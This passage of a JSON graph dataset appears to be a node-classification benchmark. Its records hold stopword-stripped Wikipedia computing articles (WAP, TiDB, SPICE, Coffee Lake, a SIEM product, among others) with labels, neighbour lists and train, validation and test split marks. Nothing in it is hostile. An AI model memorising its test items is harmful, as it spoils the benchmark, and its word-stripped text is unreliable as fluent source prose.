motorola 56001 dsp two amd 79c30a dscs used voice-quality audio input output motorola 56001 used high-quality audio dsp initially used due firmware incomplete although capability provided later update confusingly simultaneous launch decstation workstation line digital also announced range decstation-branded pc compatibles intel x86 processors ran ms-dos identified three-digit model numbers decstation 2xx 3xx 4xx series using intel 80286 80386 80486 processors respectively computers built digital tandy corporation united states olivetti europe time introduction digital offered trade-in program owners earlier x86 pc incompatible computer rainbow 100 systems based 80286 systems based 80386 systems based 80486",
    "neighbors": [
      11013,
      9742,
      783,
      8976,
      7954,
      7187,
      2452,
      7188,
      408,
      8474,
      8732,
      6942,
      7215,
      7983,
      5686,
      823,
      6846,
      9665,
      7234,
      3142,
      6854,
      8390,
      9166,
      11604,
      3945,
      6250,
      6252,
      9452,
      10220,
      11501,
      8048,
      5873,
      6129,
      499,
      5492,
      757,
      1398,
      7411,
      9723
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5874,
    "label": 4,
    "text": "Aanval:aanval aanval commercial siem product designed specifically use snort suricata syslog data aanval active development since 2003 remains one longest running snort capable siem products industry aanval dutch attack aanval created loyal moses 2003 publicly made available march 2004 released private commercial license c1-ra1008 throughout lifecycle software also referred openaanval comaanval addition current registered trademark name aanval aanval original success providing ajax style security event monitoring reporting web-browser since aanval creation become intrusion detection correlation threat management console specific focus normalizing snort suricata syslog data 2010 aanval first intrusion detection vendor provide integrated ios app allowed users view security events remotely iphone ipad ipod touch several information security related books published include details references aanval including linux server security second edition o'reilly media security log management o'reilly media snort ids ips toolkit o'reilly media 2010 unix linux system administration handbook fourth edition o'reilly media",
    "neighbors": [
      6273,
      1346,
      3714,
      8644,
      7813,
      8582,
      9732,
      6539,
      7983,
      5492,
      823,
      5245,
      3486
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5875,
    "label": 5,
    "text": "Wireless_Application_Protocol:wireless application protocol wireless application protocol wap technical standard accessing information mobile wireless network wap browser web browser mobile devices mobile phones uses protocol introduced much hype 1999 wap achieved popularity early 2000s 2010s largely superseded modern standards modern handset internet browsers fully support html need use wap markup web page compatibility therefore longer able render display pages written wml wap markup language introduction wap mobile service providers limited opportunities offer interactive data services needed interactivity support internet web applications email stock prices news sports headlines japanese i-mode system offered another major competing wireless data protocol wap standard described protocol suite stack allowing interoperability wap equipment software different network technologies gsm is-95 also known cdma bottom-most protocol suite wireless datagram protocol wdp functions adaptation layer makes every data network look bit like udp upper layers providing unreliable transport data two 16-bit port numbers origin destination upper layers view wdp one protocol several technical realizations top data bearers sms ussd etc native ip bearers gprs umts packet-radio service ppp top circuit-switched data connection wdp fact exactly udp wtls optional layer provides public-key cryptography-based security mechanism similar tls wtp provides transaction support reliable request/response adapted wireless world wtp supports effectively tcp problem packet loss occurs commonly 2g wireless technologies radio conditions misinterpreted tcp network congestion finally one think wsp initially compressed version http protocol suite allows terminal transmit requests http https equivalent wap gateway gateway translates requests plain http wireless application environment wae space defines application-specific markup languages wap version 1.x primary language wae wireless markup language wml wap 2.0 primary markup language xhtml mobile profile wap push incorporated specification allow wap content pushed mobile handset minimal user intervention wap push basically specially encoded message includes link wap address wap push specified top wireless datagram protocol wdp delivered wdp-supported bearer gprs sms gsm networks wide range modified processors gprs activation network generally supported wap push messages delivered top sms bearer receiving wap push wap 1.2 later -enabled handset automatically give user option access wap content also known wap push si service indication variant known wap push sl service loading directly opens browser display wap content without user interaction since behaviour raises security concerns handsets handle wap push sl messages way si providing user interaction network entity processes wap pushes delivers ip sms bearer known push proxy gateway ppg re-engineered 2.0 version released 2002 uses cut-down version xhtml end-to-end http dropping gateway custom protocol suite used communicate wap gateway used conjunction wap 2.0 however scenario used standard proxy server wap gateway role would shift one translation adding additional information request would configured operator could include telephone numbers location billing information handset information mobile devices process xhtml mobile profile xhtml mp markup language defined wap 2.0 subset xhtml superset xhtml basic version cascading style sheets css called wap css supported xhtml mp multimedia messaging service mms combination wap sms allowing sending picture messages wap forum founded 1998 ericsson motorola nokia unwired planet aimed primarily bring together various wireless technologies standardised protocol 2002 wap forum consolidated along many forums industry open mobile alliance oma first company launch wap site dutch mobile phone operator telfort bv october 1999 site developed side project christopher bee euan mcleod launched debut nokia 7110 marketers hyped wap time introduction leading users expect wap performance fixed non-mobile internet access bt cellnet one uk telecoms ran advertising campaign depicting cartoon wap user surfing neuromancer -like information space terms speed ease use appearance interoperability reality fell far short expectations first handsets became available 1999 led wide usage sardonic phrases worthless application protocol wait pay waplash 2003 2004 wap made stronger resurgence introduction wireless services vodafone live t-mobile t-zones easily accessible services operator revenues generated transfer gprs umts data different business model used traditional web sites isps according mobile data association wap traffic uk doubled 2003 2004 year 2013 wap use largely disappeared major companies websites since retired use wap mainstream technology web mobile number years modern handset internet browsers support full html css javascript need use kind wap markup webpage compatibility list handsets supporting html extensive includes android handsets versions iphone handset blackberry devices devices running windows phone many nokia handsets wap saw major success japan largest operator ntt docomo use wap favor in-house system i-mode rival operators kddi au softbank mobile previously vodafone japan successfully deployed wap technology particular j-phone sha-mail picture mail java jscl services well au chakuuta/chakumovie ringtone song/ringtone movie services based wap like europe wap i-mode usage declined 2010s html-capable smartphones became popular japan adoption wap us suffered many cell phone providers required separate activation additional fees data support also telecommunications companies sought limit data access approved data providers operating license signal carrier recognition problem u.s. federal communications commission fcc issued order 31 july 2007 mandated licensees 22-megahertz wide upper 700 mhz c block spectrum would implement wireless platform allows customers device manufacturers third-party application developers others use device application choice operating particular licensed network band commentators criticized several aspects wireless markup language wml wap technical criticisms include criticisms address wireless carriers particular implementations wap original wap model provided simple platform access web-like wml services e-mail using mobile phones europe se asian regions 2009 continued considerable user base later versions wap primarily targeting united states market designed different requirement enable full web xhtml access using mobile devices higher specification cost higher degree software complexity considerable discussion addressed question whether wap protocol design appropriate suggested bandwidth-sparing simple interface gopher would better match mobile phones personal digital assistants pdas initial design wap specifically aimed protocol independence across range different protocols sms ip ppp circuit switched bearer ip gprs etc. led protocol considerably complex approach directly ip might caused controversial especially many ip side design wap ip wap transmission layer protocol wtp uses retransmission mechanisms udp attempt solve problem inadequacy tcp high-packet-loss networks",
    "neighbors": [
      4609,
      9732,
      5637,
      6,
      1030,
      3086,
      8211,
      5143,
      6681,
      10271,
      10274,
      3626,
      562,
      1083,
      3133,
      1602,
      11332,
      8265,
      5201,
      9809,
      4691,
      7765,
      3162,
      7771,
      4704,
      10344,
      6763,
      6271,
      11391,
      9860,
      1160,
      9356,
      3218,
      11413,
      5270,
      9367,
      10393,
      6301,
      2206,
      1695,
      1696,
      2208,
      3742,
      9381,
      10410,
      10924,
      9909,
      7865,
      4797,
      7360,
      7364,
      10956,
      11469,
      2259,
      8923,
      737,
      6881,
      7396,
      6885,
      7399,
      8432,
      6403,
      9987,
      1285,
      3847,
      9992,
      5402,
      5405,
      7478,
      5437,
      5439,
      7492,
      2887,
      6993,
      6996,
      4957,
      5469,
      5470,
      5472,
      1893,
      11112,
      3462,
      6544,
      2449,
      7579,
      5021,
      1955,
      2996,
      11192,
      3006,
      4543,
      5063,
      9676,
      2509,
      8674,
      11240,
      8688,
      1524,
      9207,
      5118
    ],
    "mask": "Test"
  },
  {
    "node_id": 5876,
    "label": 5,
    "text": "People_Finder_Interchange_Format:people finder interchange format people finder interchange format pfif widely used open data standard information missing displaced people pfif designed enable information sharing among governments relief organizations survivor registries help people find contact family friends disaster pfif extended xml consists person records contain identifying information person note records contain comments updates status location person note attached one person pfif defines set fields records xml-based format store transfer pfif xml records embedded atom feeds rss feeds pfif allows different repositories missing person data exchange aggregate records every record unique identifier indicates domain name original repository record created unique record identifier preserved record copied one repository another example repository receives copy given person publish note attached person even note person copied repositories remain traceable respective original sources within three days 2001 september 11 attacks people using 25 different online forums survivor registries report check family friends one first largest survivor registry safe.millennium.berkeley.edu created graduate students ka-ping yee miriam walker hosted millennium computer cluster uc berkeley reduce confusion caused proliferation different websites berkeley survivor registry began collecting data several major sites one searchable database information formatted differently site site site required manual effort custom programming download incorporate data hurricane katrina displaced hundreds thousands people 2005 online survivor registries appeared many different websites large volunteer effort called katrina peoplefinder project worked gather manually re-enter information one searchable database provided salesforce.com organizer project david geilhufe put call technical help create data standard would enable survivor registries aggregate share information via automated means working katrina volunteers kieran lal jonathan plax civicrm team yee drafted first specification people finder interchange format released september 4 2005 pfif 1.0 pfif 1.1 small corrections released september 5 salesforce.com database added support pfif yahoo google also launched searchable databases katrina survivors exchanged information using pfif next major use pfif occurred 2010 haiti earthquake google launched google person finder used data model based pfif exchanged data cnn new york times national library medicine survivor registries using pfif however pfif 1.1 made us-specific assumptions applicable haiti released january 26 2010 pfif 1.2 added fields person home country international postal code fields sex age date birth status links duplicate records person pfif 1.3 released march 2011 addressed privacy personal information adding field specify expiry date person record setting requirements data deletion pfif 1.3 also moved away us-specific assumption first last name adding one field person full name pfif 1.4 released may 2012 renamed name fields given_name last_name added field alternate names added field linking personal profiles websites added support multiple photos per person following websites software projects implement pfif",
    "neighbors": [
      10090,
      8735,
      479
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5877,
    "label": 2,
    "text": "Uhuru_Mobile:uhuru mobile uhuru mobile secure android-based operating system operating system principal program allowing smartphones tablets pcs run central tool connects coordinates components kernel computers programs software device drivers letting users managing devices uhuru mobile solution composed application encryption market modified android-based os virtual private network sms encryption solution purpose uhuru mobile prevent physical attacks name uhuru comes swahili language means freedom independence uhuru mobile result research development project initiated 2012 promote digital sovereignty android-based operating system uhuru mobile focuses security privacy end-users individuals businesses mobile devices operating system currently developed software editor company called teclib ’ ensure os protection security using applications dedicated market installed replacing google play store uhuru mobile ’ applications market provides apps approved certified team security experts companies also customize uhuru marketplace providing in-house applications uhuru mobile provided deception system sending fake gps location coordinates applications decoy geolocation tool allows users fool applications using geolocation administrators define redirecting coordinates example demo version nsa headquarters coordinates sent deception system mobile device management tool administration mobile devices provided without additional setup administrators access web-console order manage uhuru mobile fleet linked applications remote apps installation/suppression set user accounts",
    "neighbors": [
      5636,
      3629,
      9646,
      7887,
      7983,
      7515,
      5363,
      5749,
      1083
    ],
    "mask": "Test"
  },
  {
    "node_id": 5878,
    "label": 1,
    "text": "CrocBITE:crocbite crocbite online database crocodile attacks reported humans non-profit online research tool helps scientifically analyze crocodile behavior via complex models users encouraged feed information crowdsourcing manner uploaded information needs verifiable database provides key insights crocodile attack patterns draws inferences save human lives online database established dr adam britton researcher charles darwin university student brandon sideleau erin britton compilation government records individual reports registered contributors historical data dr simon pooley junior research fellow imperial college london joined hands studies collaboration culminated dr pooley met dr britton iucn crocodile specialist group louisiana 2014 brandon instrumental designing database work infrastructure program received funds economic social research council united kingdom tune unspecified resourced plus amount big gecko crocodilian research crocodillian.com charles darwin university research already yielded pertinent observations provide inside crocodile attacks observed attacks humans occur bites saltwater crocodile popular understanding nile crocodiles taking top spot broad category nile crocodile attacks segmented west african crocodile crocodylus niloticus nile crocodile species get clear understanding respective attack zones objective information used communities conservation managers help inform educate people keep safe information vital australia africa attacks likely parts world database kind comprehensive collection information made available online",
    "neighbors": [
      2901
    ],
    "mask": "None"
  },
  {
    "node_id": 5879,
    "label": 1,
    "text": "TiDB:tidb tidb open-source newsql database supports hybrid transactional analytical processing htap workloads mysql compatible provide horizontal scalability strong consistency high availability developed supported primarily pingcap inc. licensed apache 2.0 tidb drew initial design inspiration google ’ spanner f1 papers tidb recognized infoworld 2018 bossie award one best open source software data storage analytics pingcap inc. software company founded april 2015 began developing tidb founding company primary developer maintainer driver tidb associated open-source communities pingcap venture-backed company announced 50 million usd series c round financing september 2018 tidb expand sql processing storage capacity adding new nodes makes infrastructure capacity scaling easier flexible compare traditional relational database scale vertically tidb acts like mysql 5.7 server applications user continue use existing mysql client libraries tidb ’ sql processing layer built scratch mysql fork compatibility 100 known behavior differences mysql tidb tidb internally shards table small range-based chunks referred regions region defaults approximately 100mib size tidb uses two-phase commit internally ensure regions maintained transactionally consistent way tidb designed work cloud make deployment provisioning operations maintenance flexible storage layer tidb called tikv became cloud native computing foundation member project august 2018 sandbox level project architecture tidb platform also allows sql processing storage scaled independently tidb support online transaction processing oltp online analytical processing olap workloads means user may traditionally transacted mysql extracted transformed loaded etl data column store analytical processing step longer required tidb uses raft consensus algorithm ensure data highly available safely replicated throughout storage raft groups event failure raft group automatically elect new leader failed member self-heal tidb cluster without required manual intervention failure self-healing operations transparent applications tidb deployed kubernetes-enabled cloud environment using tidb operator operator method packaging deploying managing kubernetes application designed running stateful workloads first introduced coreos 2016.tidb operator originally developed pingcap open-sourced august 2018 tidb operator used deploy tidb laptop google cloud platform ’ google kubernetes engine amazon web services ’ elastic container service kubernetes tidb deployed using ansible using tidb-ansible playbook docker used deploy tidb containerized environment multiple nodes multiple machines docker compose used deploy tidb single command testing purposes tidb series open-source tools built around help data replication migration existing mysql mariadb users syncer tool supports full data migration incremental data replication mysql mariadb instances tidb cluster data migration dm second-generation iteration syncer suited replicating data already sharded mysql mariadb tables tidb common use case syncer/dm connect mysql mariadb tables tidb treating tidb almost slave directly run analytical workloads tidb cluster near real-time lightning tool supports high speed full-import large mysql dump new tidb cluster providing faster import experience executing sql statement tool used populate initially empty tidb cluster lots data quickly order speed testing production migration import speed improvement achieved parsing sql statements key-value pairs directly generate sorted string table sst files rocksdb tidb-binlog tool used collect logical changes made tidb cluster used provide incremental backup replication either two tidb clusters tidb cluster another downstream platform similar functionality mysql master-slave replication main difference since tidb distributed database binlog generated tidb instance needs merged sorted according time transaction commit consumed downstream",
    "neighbors": [
      9286,
      11017,
      4011,
      8683,
      7022,
      10286,
      7248,
      7889,
      10389,
      1435,
      2910
    ],
    "mask": "Test"
  },
  {
    "node_id": 5880,
    "label": 9,
    "text": "Expressive_power_(computer_science):expressive power computer science computer science expressive power also called expressiveness expressivity language breadth ideas represented communicated language expressive language greater variety quantity ideas used represent example web ontology language expression language profile owl2 el lacks ideas negation expressed owl2 rl rule language owl2 el may therefore said less expressive power owl2 rl restrictions allow efficient polynomial time reasoning owl2 el owl2 rl owl2 el trades expressive power efficient reasoning processing knowledge representation language term expressive power may used range meaning may mean measure ideas expressible language first sense dominates areas mathematics logic deal formal description languages meaning formal language theory mathematical logic process algebra informal discussions term often refers second sense often case discussing programming languages efforts made formalize informal uses term notion expressive power always relative particular kind thing language question describe term normally used comparing languages describe kind things least comparable kinds things design languages formalisms involves trade-off expressive power analyzability formalism express harder becomes understand instances formalism say decision problems become harder answer completely undecidable formal language theory mostly studies formalisms describe sets strings context-free grammars regular expressions instance formalism e.g grammar regular expression describes particular set strings context expressive power formalism set sets strings instances describe comparing expressive power matter comparing sets important yardstick describing relative expressive power formalisms area chomsky hierarchy says instance regular expressions nondeterministic finite automatons regular grammars equal expressive power context-free grammars greater means sets sets strings described first three formalisms equal proper subset set sets strings described context-free grammars area cost expressive power central topic study known instance deciding whether two arbitrary regular expressions describe set strings hard arbitrary context-free grammars completely impossible however still efficiently decided whether given string set expressive formalisms problem harder even undecidable turing complete formalism arbitrary formal grammars problem every nontrivial property regarding set strings describe undecidable fact known rice theorem results conciseness well instance nondeterministic state machines regular grammars concise regular expressions sense latter translated former without blowup size i.e 1 reverse possible similar considerations apply formalisms describe sets strings sets trees e.g xml schema languages graphs structures database theory concerned among things database queries e.g formulas given contents database extract certain information predominant relational database paradigm contents database described finite set finite mathematical relations boolean queries always yield true false formulated first-order logic turns first-order logic lacking expressive power express certain types boolean queries e.g queries involving transitive closure however adding expressive power must done care must still remain possible evaluate queries reasonable efficiency case e.g. second-order logic consequently literature sprang many query languages language constructs compared expressive power efficiency e.g various versions datalog similar considerations apply query languages types data e.g xml query languages xquery",
    "neighbors": [
      9345,
      9224,
      1801,
      2316,
      5774,
      5245,
      4376,
      10649,
      5404,
      10909,
      6047,
      1697,
      10658,
      6437,
      6775,
      939,
      5165,
      7983,
      9397,
      1462,
      8122,
      9411,
      10435,
      8262,
      9286,
      9926,
      8396,
      9932,
      5585,
      11474,
      11219,
      2901,
      9688,
      987,
      731,
      11487,
      10083,
      7780,
      9714,
      2804,
      2294,
      119,
      5373,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 5881,
    "label": 9,
    "text": "SPICE:spice spice simulation program integrated circuit emphasis general-purpose open-source analog electronic circuit simulator program used integrated circuit board-level design check integrity circuit designs predict circuit behavior unlike board-level designs composed discrete parts practical breadboard integrated circuits manufacture high costs photolithographic masks manufacturing prerequisites make essential design circuit close perfect possible integrated circuit first built simulating circuit spice industry-standard way verify circuit operation transistor level committing manufacturing integrated circuit board-level circuit designs often breadboarded testing even breadboard circuit properties may accurate compared final printed wiring board parasitic resistances capacitances parasitic components often estimated accurately using spice simulation also designers may want information circuit available single mock-up instance circuit performance affected component manufacturing tolerances cases common use spice perform monte carlo simulations effect component variations performance task impractical using calculations hand circuit appreciable complexity circuit simulation programs spice derivatives prominent take text netlist describing circuit elements transistors resistors capacitors etc connections translate description equations solved general equations produced nonlinear differential algebraic equations solved using implicit integration methods newton method sparse matrix techniques spice developed electronics research laboratory university california berkeley laurence nagel direction research advisor prof. donald pederson spice1 largely derivative cancer program nagel worked prof. ronald rohrer cancer acronym computer analysis nonlinear circuits excluding radiation hint berkeley liberalism 1960s times many circuit simulators developed united states department defense contracts required capability evaluate radiation hardness circuit nagel original advisor prof. rohrer left berkeley prof. pederson became advisor pederson insisted cancer proprietary program rewritten enough restrictions could removed program could put public domain spice1 first presented conference 1973 spice1 coded fortran used nodal analysis construct circuit equations nodal analysis limitations representing inductors floating voltage sources various forms controlled sources spice1 relatively circuit elements available used fixed-timestep transient analysis real popularity spice started spice2 1975 spice2 also coded fortran much-improved program circuit elements variable timestep transient analysis using either trapezoidal second order adams-moulton method gear integration method also known bdf equation formulation via modified nodal analysis avoiding limitations nodal analysis innovative fortran-based memory allocation system developed another graduate student ellis cohen last fortran version spice 2g.6 1983 spice3 developed thomas quarles a. richard newton advisor 1989 written c uses netlist syntax added x window system plotting early public domain software program source code available spice widely distributed used ubiquity became spice circuit remains synonymous circuit simulation spice source code beginning distributed uc berkeley nominal charge cover cost magnetic tape license originally included distribution restrictions countries considered friendly us source code currently covered bsd license birth spice named ieee milestone 2011 entry mentions spice evolved become worldwide standard integrated circuit simulator nagel awarded 2019 ieee donald o. pederson award solid-state circuits development spice newer versions berkeley spice released version 3f.5 1993 since open-source academic continuations spice include xspice developed georgia tech added mixed analog/digital code models behavioral simulation cider previously codecs developed uc berkeley oregon state univ. added semiconductor device simulation spice opus developed maintained university ljubljana based spice 3f.4 xspice ngspice based spice 3f.5 xspice cider berkeley spice inspired served basis many circuit simulation programs academia industry commercial products first commercial version spice ispice interactive version timeshare service national css prominent commercial versions spice include hspice originally commercialized ashawna kim hailey meta software owned synopsys pspice owned cadence design systems integrated circuit industry adopted spice quickly commercial versions became well developed many ic design houses proprietary versions spice today ic manufacturers typically larger companies groups continuing develop spice-based circuit simulation programs among adice analog devices ltspice linear technology available public freeware mica freescale semiconductor tina texas instruments similarly linear technology texas instruments makes available freeware windows version tina software called tina-ti also includes version spice comes preloaded models company integrated circuits analog devices offers similar free tool called adisimpe based simetrix/simplis implementation spice companies maintain internal circuit simulators directly based upon spice among powerspice ibm titan infineon technologies lynx intel corporation pstar nxp semiconductor spice became popular contained analyses models needed design integrated circuits time robust enough fast enough practical use precursors spice often single purpose bias program example simulation bipolar transistor circuit operating points slic program small-signal analyses spice combined operating point solutions transient analysis various small-signal analyses circuit elements device models needed successfully simulate many circuits spice2 included analyses since spice generally used model nonlinear circuits small signal analyses necessarily preceded quiescent point calculation circuit linearized spice2 also contained code small-signal analyses sensitivity analysis pole-zero analysis small-signal distortion analysis analysis various temperatures done automatically updating semiconductor model parameters temperature allowing circuit simulated temperature extremes circuit simulators since added many analyses beyond spice2 address changing industry requirements parametric sweeps added analyze circuit performance changing manufacturing tolerances operating conditions loop gain stability calculations added analog circuits harmonic balance time-domain steady state analyses added rf switched-capacitor circuit design however public-domain circuit simulator containing modern analyses features needed become successor popularity spice yet emerged important use appropriate analyses carefully chosen parameters example application linear analysis nonlinear circuits justified separately also application transient analysis default simulation parameters lead qualitatively wrong conclusions circuit dynamics spice2 included many semiconductor device compact models three levels mosfet model combined ebers–moll gummel–poon bipolar model jfet model model junction diode addition many elements resistors capacitors inductors including coupling independent voltage current sources ideal transmission lines active components voltage current controlled sources spice3 added sophisticated mosfet models required due advances semiconductor technology particular bsim family models added also developed uc berkeley commercial industrial spice simulators added many device models technology advanced earlier models became inadequate attempt standardization models set model parameters may used different simulators industry working group formed compact model council choose maintain promote use standard models standard models today include bsim3 bsim4 bsimsoi psp hicum mextram traditional photonic device simulators apply direct methods solve maxwell equations complete structure whereas photonic circuit simulators based segmentation building blocks bbs represented logic level phothonic device coupled bbs guided modes optical waveguides circuit-level modeling photonic integrated circuit pic contain electrical wires optical signals respectively described voltage/current complex-valued envelope forward- backward-propagating modes building block netlist photonic electronic circuits including net port connections expressed spice format schematic editors like ones used electronic design automation reproduce complete photonic signal information without losing eventual optical phenomena needed real-time waveform electric magnetic field every mode polarization waveguide spice works 10 time steps timescale datacommunications ≈10–100 10 common make amount information tractable modulation increases complexity encode amplitude phase way similar simulation rf circuits however photonic integrated circuit simulators need test multiple communication channels match different carrier frequencies equivalently amplitudes single channel type sophisticated signal unsupported spice program features structure described 2019 spice ca n't used simulate photonics electronics together photonic circuit simulator thus n't yet considered test simulator photonic integrated circuits spice2 took text netlist input produced line-printer listings output fit computing environment 1975 listings either columns numbers corresponding calculated outputs typically voltages currents line-printer character plots spice3 retained netlist circuit description allowed analyses controlled command-line interface similar c shell spice3 also added basic x plotting unix engineering workstations became common vendors various free software projects added schematic capture front-ends spice allowing schematic diagram circuit drawn netlist automatically generated also graphical user interfaces added selecting simulations done manipulating voltage current output vectors addition capable graphing utilities added see waveforms graphs parametric dependencies several free versions extended programs available introductory limited packages without restrictions since transient analysis dependent time uses different analysis algorithms control options different convergence-related issues different initialization parameters dc analysis however since transient analysis first performs dc operating point analysis unless uic option specified .tran statement dc analysis algorithms control options initialization convergence issues apply transient analysis circuits oscillators circuits feedback stable operating point solutions circuits either feedback loop must broken dc operating point calculated initial conditions must provided simulation input dc operating point analysis bypassed uic parameter included .tran statement uic included .tran statement transient analysis started using node voltages specified .ic statement node set 5 v .ic statement value node first time point time 0 5 v. use .op statement store estimate dc operating point transient analysis codice_1 .tran statement uic parameter example bypasses initial dc operating point analysis .op statement calculates transient operating point 20 ns transient analysis although transient analysis might provide convergent dc solution transient analysis still fail converge transient analysis error message internal timestep small indicates circuit failed converge convergence failure might due stated initial conditions close enough actual dc operating point values",
    "neighbors": [
      11333,
      7367,
      7819,
      3756,
      7820,
      4792,
      4243,
      5301,
      3960,
      3323,
      2045,
      8606
    ],
    "mask": "Test"
  },
  {
    "node_id": 5882,
    "label": 3,
    "text": "Chack'n_Pop:chack n pop arcade rom-set also contains unused graphics mechanical wind-up zen-chan later appeared bubble bobble home ports released sg-1000 msx famicom nec pc-6001 nec pc-8801 arcade emulation included taito legends power-up psp taito legends 2 xbox playstation 2 pc chack n small yellow creature later recolored green extendable legs must traverse series single-screen mazes capable walking floors ceilings walls climb steps traverse high walls extending legs tall enough pass onto next step capable throwing hand grenades left right short period explode cloud smoke separate fire buttons control rolling left right chack n killed caught explosion cloud screen played time limit marked mighta pushing boulder along top screen mighta reappears bubble bobble recurring enemy chack n aim reach top screen time limit expires delayed process series solid walls order get past walls must free hearts cages using hand grenades obstruction comes form monstas creatures appear bubble bobble hatching eggs hand grenades also used destroy creatures eggs producing however player get bonus points completing level destroying enemies later levels include moving platforms reminiscent bubble bobble water bottles blown flood level water water destroy anything way inhibit movement enemies allows chack n swim otherwise unreachable platforms levels completed chack n able marry girlfriend miss chack n sega sg-1000 version extended introduction ending sequences small additional training stage first chack n content chack n pop appeared bubble bobble fairyland story parasol stars puzzle bobble bubble symphony bubble memories pop n pop arkanoid ds huge silver robotic chack n also mid-boss stage 5 taito arcade shooter megablast",
    "neighbors": [
      10316,
      9006,
      5263,
      10931,
      1693
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5883,
    "label": 3,
    "text": "Coffee_Lake:coffee lake coffee lake intel codename second 14 nm process node refinement following broadwell skylake kaby lake integrated graphics coffee lake chips allow support dp 1.2 hdmi 2.0 hdcp 2.2 connectivity coffee lake natively supports ddr4-2666 mhz memory dual channel mode used xeon core i5 i7 i9 cpus ddr4-2400 mhz memory dual channel mode used celeron pentium core i3 cpus lpddr3-2133 mhz memory used mobile cpus desktop coffee lake cpus introduces major changes intel core cpus nomenclature i5 i7 cpus feature six cores along hyper-threading case latter core i3 cpus four cores dropping hyper-threading first time received change well 9th generation release october 2018 changed nomenclature core i7 moving 8 cores dropping hyper-threading first time new mainstream desktop core i9 processors released featuring 8 cores hyper-threading chips released october 5 2017 coffee lake used conjunction 300-series chipset officially work 100- 200-series chipset motherboards although desktop coffee lake processors use physical lga 1151 socket skylake kaby lake pinout electrically incompatible older processors motherboards april 2 2018 intel released additional desktop core i3 i5 i7 pentium gold celeron cpus first six-core core i7 i9 mobile cpus hyper-threaded four-core core i5 mobile cpus first coffee lake ultra-power cpus intel iris plus graphics october 8 2018 intel launched 9th generation coffee lake refresh cpus eight cores avoid running thermal problems high clockspeeds intel soldered integrated heat spreader ihs cpu die instead using thermal paste core i7 i9 however core i5 still use thermal paste cpu die ihs development led intel israel processor design team haifa israel optimization kaby lake intel first launched 8th generation intel core family processors august 2017 release new 8th gen intel core i9 processor 2018 intel said would highest-performance laptop processor intel ever built coffee lake cpus built using second refinement intel 14 nm process 14 nm++ features increased transistor gate pitch lower current density higher leakage transistors allows higher peak power higher frequency expense die area idle power coffee lake marks shift number cores intel mainstream desktop processors first update previous ten-year history intel core cpus 8th generation mainstream desktop i7 cpus feature six cores 12 threads i5 cpus feature six single-threaded cores i3 cpus feature four single-threaded cores 9th generation intel core i9 branding made debut mainstream desktop describing cpus 8 cores 16 threads 9th generation i7s feature 8 single-threaded cores marking first time desktop core i7s featured intel hyper-threading technology 9th generation i5 cpus feature six single-threaded cores like 8th generation predecessors ninth generation core series includes hardware fixes meltdown v3 l1 terminal fault 300 series chipsets using physically identical lga 1151 socket 100 200 series chipsets officially compatible coffee lake cpus meaning older motherboards officially support coffee lake processors 300 series motherboards officially support skylake kaby lake processors enthusiast z370 rebranded z270 launched alongside first coffee lake cpus october 2017 officially supported chipset mainstream cpus full lineup cpus revealed april 2018 accompanied lower-end h310 b360 h370 q370 chipsets home business users z390 chipset launched alongside release 9th generation cpus supporting 8th 9th generation mainstream desktop parts b365 chipset added later 9th generation xeons need motherboards chipset c246 coffee lake features largely cpu core performance per mhz skylake/kaby lake features specific coffee lake include august 8 2017 intel announced new eighth generation processors would revealed following august 21 intel previous changes product generations coincided new microarchitectures unclear generally expected eighth core generation products would based new coffee lake microarchitecture however officially announced august 21 2017 intel stated eighth generation would based multiple microarchitectures including kaby lake coffee lake cannon lake additional core resources mid-range eighth-generation coffee lake desktop chips offer significant gains performance versus previous seventh-generation intel cpus multi-threaded workloads however architecture delivers noipc difference skylake kaby lake processors mark first time intel released mainstream consumer cpus support 128gb ram nowiki /nowiki various reviews show core i7-8700k cpu may consume 110w load first 9th generation coffee lake cpus released fourth quarter 2018 include hardware mitigations certain meltdown/spectre vulnerabilities main differences 8th generation besides increased frequency even though f suffix cpus lack integrated gpu intel set price cpus featureful counterparts nowiki /nowiki various reviews show core i9-9900k cpu may consume 140w load",
    "neighbors": [
      3459,
      5380,
      3973,
      8325,
      9095,
      5386,
      9611,
      4108,
      9741,
      5649,
      6033,
      5523,
      6804,
      7313,
      4886,
      8851,
      3352,
      9111,
      9500,
      10658,
      10019,
      2088,
      10669,
      9391,
      10675,
      4276,
      1461,
      10548,
      2237,
      5309,
      8125,
      8126,
      833,
      6339,
      5444,
      9541,
      1998,
      2638,
      977,
      2514,
      5073,
      2516,
      5329,
      5844,
      9435,
      4444,
      7134,
      1119,
      9057,
      1000,
      7657,
      1260,
      4204,
      5356,
      5871,
      8684,
      9582,
      10734,
      499,
      8820,
      3317,
      4217,
      4603,
      5503
    ],
    "mask": "Train"
  },
  {
    "node_id": 5884,
    "label": 4,
    "text": "HTTP_POST_flood:http post flood http post flood simply post flood denial service attack uses post requests part hypertext transfer protocol http one kind http flood attack late 2013 post floods increasingly launched mobile devices",
    "neighbors": [
      4498,
      4797
    ],
    "mask": "Test"
  },
  {
    "node_id": 5885,
    "label": 9,
    "text": "Generalized_algebraic_data_type:generalized algebraic data type functional programming generalized algebraic data type gadt also first-class phantom type guarded recursive datatype equality-qualified type generalization parametric algebraic data types gadt product constructors called data constructors haskell provide explicit instantiation adt type instantiation return value allows defining functions advanced type behaviour data constructor haskell 2010 return value type instantiation implied instantiation adt parameters constructor application -- parametric adt gadt data list nil cons list integers cons 12 cons 107 nil -- type integers list int strings cons boat cons dock nil -- type strings list string -- gadt data expr eval expr eval e case e expr1 eequal eint 2 eint 3 -- type expr1 expr bool ret eval expr1 -- ret false currently implemented ghc compiler non-standard extension used among others pugs darcs ocaml supports gadt natively since version 4.00 ghc implementation provides support existentially quantified type parameters local constraints early version generalized algebraic data types described based pattern matching alf generalized algebraic data types introduced independently prior extensions ml haskell algebraic data types essentially equivalent similar inductive families data types inductive datatypes found coq calculus inductive constructions dependently typed languages modulo dependent types except latter additional positivity restriction enforced gadts type inference absence programmer supplied type annotations undecidable functions defined gadts admit principal types general type reconstruction requires several design trade-offs area active research applications gadts include generic programming modelling programming languages higher-order abstract syntax maintaining invariants data structures expressing constraints embedded domain-specific languages modelling objects important application gadts embed higher-order abstract syntax type safe fashion embedding simply typed lambda calculus arbitrary collection base types tuples fixed point combinator type safe evaluation function factorial function written would run problems using regular algebraic data types dropping type parameter would made lifted base types existentially quantified making impossible write evaluator type parameter would still restricted single base type furthermore ill-formed expressions 